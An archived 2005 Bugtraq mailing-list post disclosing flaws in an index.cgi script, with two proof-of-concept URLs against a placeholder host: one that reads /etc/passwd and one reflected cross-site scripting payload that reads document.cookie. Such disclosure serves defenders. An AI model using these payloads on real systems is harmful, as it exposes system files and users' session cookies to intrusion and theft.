[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

index.cgi script XSS + file show

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: index.cgi script XSS + file show
From: fireboy fireboy <fireboynet@xxxxxxxxxxxx>
Date: 24 Apr 2005 21:08:19 -0000


Tunis 24/04/2005
BUG found by fireboy
fireboy@xxxxxxxxxxxx



THERE ARE SOME BUGS IN  index.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A 
SYSTEM 

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 



1)file showing
http://www.target.com/index.cgi?/etc/passwd


2)CSS
http://www.target.com/index.cgi?&lt;script&gt;alert(document.cookie)&lt;/script&gt;


greetz to all magattack members www.magattack.tk

Follow-Ups:
- Re: index.cgi script XSS + file show
  - From: D.C. van Moolenbroek

Prev by Date: Re: BitDefender 8 - Race condition vulnerability
Next by Date: remote command execution in forum.pl script
Previous by thread: remote command execution in text.cgi script
Next by thread: Re: index.cgi script XSS + file show
Index(es):
- Date
- Thread